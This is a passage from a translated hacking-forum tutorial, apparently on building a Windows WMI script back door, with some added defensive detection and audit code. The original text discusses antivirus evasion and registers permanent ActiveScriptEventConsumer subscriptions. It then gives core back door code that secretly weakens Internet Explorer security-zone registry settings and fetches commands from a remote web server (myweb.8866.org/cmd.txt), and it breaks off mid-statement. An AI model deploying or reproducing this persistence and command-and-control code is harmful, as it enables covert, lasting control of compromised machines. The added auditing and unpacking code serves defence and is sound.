Is it effective against anti-virus software? I don't know. Perhaps the engine ignores case and automatically joins concatenated strings; perhaps it even does "lexical analysis"... Is this packer practical? No, because its algorithm is too simple. The seed is A000 = A005 Mod 10 + 2, so ignoring the automatic variable renaming there are only ten possible packed forms. How can the packer be improved? With more complex algorithms and more "polymorphism", of course.
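The author's guess about what a scanner might do is easy to make concrete. As an added PowerShell example (not code from the article), the functions below apply the normalisation a static scanner can use to undo the transformations described above: join split literals regardless of whether "+" or "&" was used, fold case, and brute-force the reverse-every-n "packer", which has no secret at all, since the seed is a small integer and the plaintext must contain a WSH keyword. The sample inputs are constructed from the article's own snippets.

```powershell
# Added example, not the author's code: static normalisation of the evasion tricks above and a
# brute force of the reverse-every-n packer. Sample inputs are constructed from the article's snippets.
function Join-SplitLiterals {
    # "Scr" & "ipt"  and  "Scr" + "ipt"  both become  "Script"; whitespace around the operator is allowed
    param([string]$Code)
    return $Code -replace '"\s*[&+]\s*"', ''
}

function Normalize-Vbs {
    # what a scanner sees after undoing splits, line continuations, spacing and case
    param([string]$Code)
    $c = Join-SplitLiterals $Code
    $c = $c -replace '\s*_\s*\r?\n\s*', ' '     # undo line continuations
    $c = $c -replace '[ \t]+', ' '
    return $c.ToLowerInvariant()
}

function Unpack-Reversed {
    # undo  rev = rev + StrReverse(Mid(str, i, key))  for one candidate key
    param([string]$Text, [int]$Key)
    $sb = New-Object System.Text.StringBuilder
    for ($i = 0; $i -lt $Text.Length; $i += $Key) {
        $chunk = $Text.Substring($i, [Math]::Min($Key, $Text.Length - $i)).ToCharArray()
        [Array]::Reverse($chunk)
        [void]$sb.Append((-join $chunk))
    }
    return $sb.ToString()
}

function Find-PackerKey {
    # try every plausible seed and stop at the first plaintext containing a WSH marker
    param([string]$Text,
          [string[]]$Markers = @('wscript', 'createobject', 'execute', 'scripting.filesystemobject'),
          [int]$MaxKey = 32)
    for ($k = 1; $k -le $MaxKey; $k++) {
        $plain = (Unpack-Reversed $Text $k).ToLowerInvariant()
        foreach ($m in $Markers) {
            if ($plain.Contains($m)) { return [pscustomobject]@{ Key = $k; Plain = $plain } }
        }
    }
    return $null
}

# constructed samples: the Execute form of the split literal, and the runtime value of the key-3 packed string
$split  = 'Execute("Set fso = Crea" + "teObject(""Scr" + "ipting.FileSy" & "stemObject"")")'
$packed = 'cswpire.tohco" "!k'
(Normalize-Vbs $split).Contains('scripting.filesystemobject')
Find-PackerKey $packed
```

The first call reports whether the classic FSO signature reappears once the splits are joined; the second recovers the seed and the plaintext wscript.echo "ok!" from the packed string. Colon-for-newline swaps are deliberately not normalised with a regex, because a colon also appears inside legitimate literals such as winmgmts: and http://; handling those correctly needs the tokenizer the author mentions.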

If you are interested, you can look at the "original" script code (replace each colon with a line break for better readability) and then strengthen it. Of course, you can also start from scratch and show your own creativity.

[To do a back door]

Before the script itself, a very useful WMI object has to be introduced; in fact it is the key to this section, and the script back door is just one application of it. As mentioned earlier, WMI is event-driven. The whole event handling mechanism is divided into four parts:

1. Event providers (producers): responsible for generating events. WMI contains many event providers, both specific ones such as the performance counter provider and general-purpose ones that deliver the generic creation, modification and deletion events of instances and classes.
2. Event filters: the system generates a large number of events all the time, and a script captures only the events it is interested in through a custom filter.
3. Event consumers: responsible for handling events. A consumer can be an executable program, a dynamic link library (DLL, loaded by WMI) or a script.
4. Event bindings: binding a filter to a consumer makes clear which consumer is responsible for handling which events.

Event consumers are divided into temporary and permanent ones. A temporary consumer only cares about specific events while it is itself running. A permanent consumer is registered as an instance of a class in a WMI namespace and stays valid until it is cancelled. Obviously, permanent event consumers are more practical.

Let's look at an example:

CODZ:
nslink = "winmgmts:\\.\root\cimv2:"   ' only a local connection is needed, so this moniker syntax suffices and no SWbemLocator object is required
Set asec = GetObject(nslink & "ActiveScriptEventConsumer").SpawnInstance_   ' create an "active script event consumer"
asec.Name = "stopped_spooler_restart_consumer"   ' name of the consumer
asec.ScriptingEngine = "vbscript"   ' scripting language (only VBScript is supported)
asec.ScriptText = "GetObject(""winmgmts:Win32_Service='spooler'"").StartService"   ' the script code
Set asecpath = asec.Put_   ' register the consumer; its object path is returned
Set evtflt = GetObject(nslink & "__EventFilter").SpawnInstance_   ' create an event filter
evtflt.Name = "stopped_spooler_filter"   ' name of the filter
qstr = "select * from __InstanceModificationEvent within 5"   ' poll for "instance modification events" every 5 seconds
qstr = qstr & " where TargetInstance isa ""Win32_Service"""   ' the class of the target instance is Win32_Service
qstr = qstr & " and TargetInstance.Name=""spooler"""   ' the instance name is spooler
qstr = qstr & " and TargetInstance.State=""Stopped"""   ' the State property is Stopped
evtflt.Query = qstr   ' the query
evtflt.QueryLanguage = "wql"   ' query language (only WQL is supported)
Set fltpath = evtflt.Put_   ' register the filter; its object path is returned
Set fcbnd = GetObject(nslink & "__FilterToConsumerBinding").SpawnInstance_   ' create the binding between filter and consumer
fcbnd.Consumer = asecpath.Path   ' the consumer
fcbnd.Filter = fltpath.Path   ' the filter
fcbnd.Put_   ' perform the binding
WScript.Echo "Installation complete"

What this script does: when the state of the Spooler service changes to stopped, the consumer handles the event by restarting Spooler. Try "net start spooler" and then "net stop spooler": within at most 5 seconds, Spooler starts again. Running the script as-is gives an error, because ActiveScriptEventConsumer (ASEC) is not installed into the root\cimv2 namespace by default. Open %windir%\system32\wbem\scrcons.mof with Notepad and delete its first line, "#pragma namespace("\\\\.\\root\\default")", or change it to "#pragma namespace("\\\\.\\root\\cimv2")". XP/2003 do not have this line, so no modification is needed there. Then run:

C:\WINNT\system32\wbem>mofcomp.exe -N:root\cimv2 scrcons.mof
Microsoft (R) 32-bit MOF Compiler Version 1.50.1085.0007
Copyright (c) Microsoft Corp. 1997-1999. All rights reserved.
Parsing MOF file: scrcons.mof
MOF file has been successfully parsed
Storing data in the repository...
Done!

This installs the ASEC into root\cimv2. mofcomp.exe and scrcons.mof both ship with the system. On 2000 the ASEC is installed into the root\default namespace by default, and on XP/2003 into root\subscription; but an event filter registered there cannot capture events from another namespace (on XP/2003 it can), an event binding cannot span namespaces, and most events are generated in root\cimv2, so the ASEC has to be reinstalled into the namespace where the event source lives. The following script completes the ASEC reinstallation automatically.

CODZ:
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
path = shl.ExpandEnvironmentStrings("%windir%\system32\wbem")
Set mof = fso.OpenTextFile(path & "\scrcons.mof", 1, False, -1)   ' the MOF file is in Unicode format
mofs = mof.ReadAll
mof.Close
mofs = Replace(mofs, "\default", "\cimv2", 1, 1)   ' replace the default namespace (first occurrence only)
mofp = path & "\spacecimv2.mof"
Set mof = fso.CreateTextFile(mofp, False, True)   ' create a temporary Unicode MOF file
mof.Write mofs
mof.Close
shl.Run path & "\mofcomp.exe -N:root\cimv2 " & mofp, 0, True   ' install into root\cimv2 and wait for mofcomp to finish
fso.DeleteFile mofp
WScript.Echo "Installation complete"

Unregister the permanent event:

CODZ:
nslink = "winmgmts:\\.\root\cimv2:"
myconsumer = "stopped_spooler_restart_consumer"   ' name of the consumer
myfilter = "stopped_spooler_filter"   ' name of the filter
Set binds = GetObject(nslink & "__FilterToConsumerBinding").Instances_
For Each bind In binds
    ' the reference properties end in ...Name="<name>", so compare the tail including the closing quote
    If StrComp(Right(bind.Consumer, Len(myconsumer) + 1), myconsumer & Chr(34), 1) = 0 _
       And StrComp(Right(bind.Filter, Len(myfilter) + 1), myfilter & Chr(34), 1) = 0 Then
        GetObject("winmgmts:" & bind.Consumer).Delete_   ' delete the consumer
        GetObject("winmgmts:" & bind.Filter).Delete_   ' delete the filter
        bind.Delete_   ' delete the binding
        Exit For
    End If
Next
WScript.Echo "Uninstall complete"

Besides ASEC, WMI provides other permanent event consumers, such as SMTPEventConsumer: when something abnormal happens on the system, it can automatically send mail to the administrator's mailbox. The WMI Event Registration tool in WMI Tools is used to create, modify and delete instances of permanent event consumers, event filters and timer event sources in a specified namespace, and to bind or unbind them.
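The uninstall script above only knows the two names it created. As an added audit example (not from the original article), the following script walks every filter-to-consumer binding in the three namespaces the article mentions and prints the filter query and the consumer, including the ScriptText of any ActiveScriptEventConsumer, which otherwise lives only inside the CIM repository; the file name in the usage comment is assumed.

```vbscript
' Added audit example, not from the original article: list every permanent
' event subscription (filter -> consumer binding) in the namespaces the
' article mentions, and show the script body of any ActiveScriptEventConsumer.
' Usage (file name assumed): cscript //nologo wmi_subscription_audit.vbs
Option Explicit
Dim namespaces, ns
namespaces = Array("root\subscription", "root\cimv2", "root\default")
For Each ns In namespaces
    AuditNamespace ns
Next

Sub AuditNamespace(ns)
    Dim svc, bind, flt, cons
    On Error Resume Next
    Set svc = GetObject("winmgmts:\\.\" & ns)
    If Err.Number <> 0 Then
        WScript.Echo "[" & ns & "] not accessible: " & Err.Description
        Err.Clear
        Exit Sub
    End If
    On Error GoTo 0
    WScript.Echo "== " & ns & " =="
    For Each bind In svc.InstancesOf("__FilterToConsumerBinding")
        ' Filter and Consumer are object-path references such as
        '   __EventFilter.Name="stopped_spooler_filter"
        On Error Resume Next
        Set flt = svc.Get(bind.Filter)
        Set cons = svc.Get(bind.Consumer)
        If Err.Number <> 0 Then
            WScript.Echo "Binding with unresolved reference: " & bind.Path_.RelPath
            Err.Clear
        Else
            WScript.Echo "Binding : " & bind.Path_.RelPath
            WScript.Echo "  Filter  : [" & flt.QueryLanguage & "] " & flt.Query
            WScript.Echo "  Consumer: " & cons.Path_.Class & " " & cons.Name
            If cons.Path_.Class = "ActiveScriptEventConsumer" Then
                ' the consumer type the article uses; ScriptText is the code
                ' that scrcons.exe runs when the bound filter fires
                WScript.Echo "  Engine  : " & cons.ScriptingEngine
                WScript.Echo "  Script  : " & cons.ScriptText
            ElseIf cons.Path_.Class = "CommandLineEventConsumer" Then
                WScript.Echo "  Command : " & cons.CommandLineTemplate
            End If
        End If
        On Error GoTo 0
    Next
End Sub
```

Run it before and after the installation script above: the stopped_spooler_filter binding should appear only in root\cimv2 afterwards, and any binding or script body you did not put there yourself deserves a closer look.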

Regarding the various parts of the event handling mechanism, the "WMI Technical Guide" has a detailed account, and MSDN is of course more comprehensive, so I will not repeat them here. (Take a sip of water and rest a bit ^_^)

Now let's start discussing the script back door. WMI provides two timers, __AbsoluteTimerInstruction and __IntervalTimerInstruction, which generate events at a specified time or at a fixed interval. Register a filter to capture the timer events and bind it to an ASEC, and we have obtained a rather unusual auto-start method. Moreover, the script code is hidden entirely in the CIM repository and does not exist as a separate file, so it is harder to remove. That is the advantage of a script back door, but there are also many difficulties:

1. When the script runs, scrcons.exe acts as the script host under the SYSTEM account (Windows' designers were not so foolish as to use the WMI service itself as the script host). This adds a process; although it is a normal process that anti-virus software says nothing about, it is too conspicuous. So the script must not keep running in the background; it should start each time, do its work and end as soon as possible. After the script ends, the scrcons.exe process does not exit automatically, so the script itself must use the Win32_Process object provided by WMI to terminate its own host process (cooking the beans by burning the beanstalks?!).
2. The networking capabilities of scripts are very poor, relying basically on objects such as Microsoft.XMLHTTP. A script back door therefore cannot listen on a port and provide a CMD shell; it can only connect to a web server to fetch control commands. A feasible way is to put a command file on a web server; the script back door finds the server by domain name, downloads the command file and acts according to its content. So you need a web server, or build a temporary one with a tool such as NetBox. Of course, the server does not need to be online all the time, only when you want to control the script again.
3. Since the script back door runs intermittently, the same command must be prevented from running twice. The solution is to record the length of the command in the registry; each time a command is fetched, compare its length with the recorded one: if they are equal, skip it; if they differ, overwrite the record and execute the command.
4. To get through the firewall with the IE object, the XMLHTTP object must be created inside IE, which is then subject to the security level of the Internet zone. Even if the code is saved in an HTML file and opened with IE, it is still only in the "My Computer" zone, and creating an unsafe ActiveX object still pops up a warning dialog. The solution is to modify the registry and temporarily change the security settings.
5. The WScript object is provided by WScript.exe or CScript.exe, and scrcons.exe does not provide it, so many common functions such as WScript.Sleep cannot be used. Without Sleep, XMLHTTP cannot be used asynchronously, and synchronous XMLHTTP may block for a long time, which is an even bigger drawback. Calling the ping command for a delay spawns a new process, and the Popup method of WScript.Shell comes with a "ding" sound. Fortunately, Microsoft.XMLHTTP has "relatives" such as MSXML2.XMLHTTP, MSXML2.ServerXMLHTTP, MSXML2.DOMDocument and WinHttp.WinHttpRequest; the last one can set a timeout, which is just what is needed.

Even with all these difficulties, the script back door is still worth the challenge.

When the various Trojans on a compromised machine have all been cleaned out by anti-virus software, a script back door that has been running 24 hours a day may be your last hope.

Here is the core code of a simple script back door (without the installation function):

CODZ:
cmdu = "http://myweb.8866.org/cmd.txt"   ' URL of the command file
cmdw = 4000   ' timeout for downloading from the web server: 4 seconds
cmdl = "HKLM\Software\Microsoft\WBEM\CIMOM\cmdlength"   ' name of the registry value that records the command length
On Error Resume Next   ' ignore errors (comment out while debugging)
Set shl = CreateObject("WScript.Shell")   ' the WScript root object is unavailable here, but its child objects still are
Set aso = CreateObject("ADODB.Stream")
Set ie = CreateObject("InternetExplorer.Application")   ' use IE to get through the firewall
zone = "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
set1 = zone & "01"
set2 = zone & "00"
set3 = zone & "\CurrentLevel"
val1 = shl.RegRead(set1)   ' save the original security settings
val2 = shl.RegRead(set2)
val3 = shl.RegRead(set3)
regd = "REG_DWORD"
shl.RegWrite set1, 0, regd   ' allow unsafe ActiveX
shl.RegWrite set2, 0, regd   ' allow active scripting
shl.RegWrite set3, 0, regd   ' set the current Internet zone security level to "custom"
ie.Visible = 0   ' ie.Visible = 1 while debugging
ie.Navigate "about" & ":blank"   ' the string concatenation is purely to evade the forum filter
ie.Document.Write _